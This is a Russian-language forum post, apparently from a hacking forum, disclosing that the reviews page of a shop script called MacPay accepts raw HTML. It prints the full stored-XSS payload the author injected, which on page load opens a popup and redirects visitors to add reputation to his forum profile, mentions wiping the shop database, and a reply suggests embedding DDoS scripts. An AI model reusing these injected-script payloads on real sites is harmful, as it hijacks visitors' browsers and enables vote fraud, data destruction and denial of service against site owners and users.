Внимание! Все Администраторы магазинов со скриптом от MacPay или как он там называется ps http://lolzteam.ru/t12847/ Почему "или как он там называется"? Так потому-что при установке там вообще fox какой-то, а 40% скрипта от стандартного lazzypay и сам MacPay его кажется не использует, название я считаю сделано для пиара.. Так вот, перейдем к багу можно сказать. Когда вы установили скрипт, то вверху у вас будет страничка с отзывами: /reviews А у этих отзывов есть функция поддерживать html код. Например, я сделал на своем тестовом сайте, переадресацию на мой профиль лолза. ps Добро пожаловать! - Переадресация происходит через 4сек + открывается новое окошко. Так что, тестируйте все, прежде чем добавлять свой товар на "дырявые" скрипты. Если немного повозится, можно не только переадресацию сделать, а открыть допустим форму _get и удалить к херам всю вашу базу :D Фиксите сами, это делается в 5минут, ну или тупо удалите страницу. Скрипт который я туда вставил: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><title>SomeTitle</title><script LANGUAGE="Javascript"> <!--function OpenWin(){windop = window.open("http://lolzteam.ru/reputation.php?do=addreputation&p=47584","WinName","height=120,width=300");}</SCRIPT></head><body onload="OpenWin();"></body></html> <head><meta http-equiv="refresh" content="10;URL=http://lolzteam.ru/reputation.php?do=addreputation&p=47584" /></head>[/HTML] Код <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251" /><title>SomeTitle</title><script LANGUAGE="Javascript"> <!--function OpenWin(){windop = window.open("http://lolzteam.ru/reputation.php?do=addreputation&p=47584","WinName","height=120,width=300");}</SCRIPT></head><body onload="OpenWin();"></body></html> <head><meta http-equiv="refresh" content="10;URL=http://lolzteam.ru/reputation.php?do=addreputation&p=47584" /></head>[/HTML]
Хехе. Знал. alert/cmd и прочие работают. ну или же встроить скрипт ддоса. и вот тебе ддосер. а алучше гугл паука фреймом 50000000раз и самого сбя ддосить :D